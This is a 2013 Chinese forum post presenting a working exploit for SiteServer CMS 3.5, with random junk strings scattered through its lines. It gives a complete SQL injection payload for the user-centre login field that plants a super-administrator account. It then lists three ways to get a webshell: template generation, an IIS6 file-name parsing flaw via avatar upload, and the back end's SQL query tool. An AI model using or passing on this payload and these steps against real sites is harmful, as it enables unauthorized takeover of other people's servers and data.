经测试秒杀最新的3.5版! r4 H: U; a4 ~ G" A) D" e! D
stieserver官网:www.siteserver.cn
; _3 h- l( ~" a; K8 YEXP: v3 s5 j# g) H' d1 z7 o. v
直接访问UserCenter/login.aspx
/ N$ a9 i* \/ U& G! l6 u% Q用户名处输入:
0 E! r6 Y1 Y, K6 a% ]
- s/ [' y3 |% B) Z123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–, p: `* e ~" y: a. {4 a
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。+ C$ L$ M+ ^5 F1 f9 q$ B
之后再访问后台SiteServer/login.aspx用插入的用户登陆0 d4 t J1 v( V( s& W
后台拿webshell的三种方法:1 g. }, u- }+ c7 G& N4 I
一、0 Y) w) V& |; {) `
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx4 t# [8 h8 `6 F& h
二、/ p" w) R7 |) [. ~. Y$ U h
成员权限-》添加用户-》用户名为:1.asp
5 b* }: ?4 H; ]+ ehttp://127.0.0.1/usercenter/! e# W7 h q' C
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
9 ], \! G3 j5 \9 u7 o* t(ps:后台添加用户时不会验证是否含有非法字符), J& W' M, r0 o7 c& L
三、
( S2 [5 B9 E4 Q: X* h( p系统工具-》实用工具-》机器参数查看
, I: _% h$ K2 v/ Y& T+ }可以看到数据库类型、名称,WEB路径0 E7 [# h1 u' c5 e+ j
系统工具-》数据库工具-》SQL语句查询1 L& p- H) a/ K! e, T9 g
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对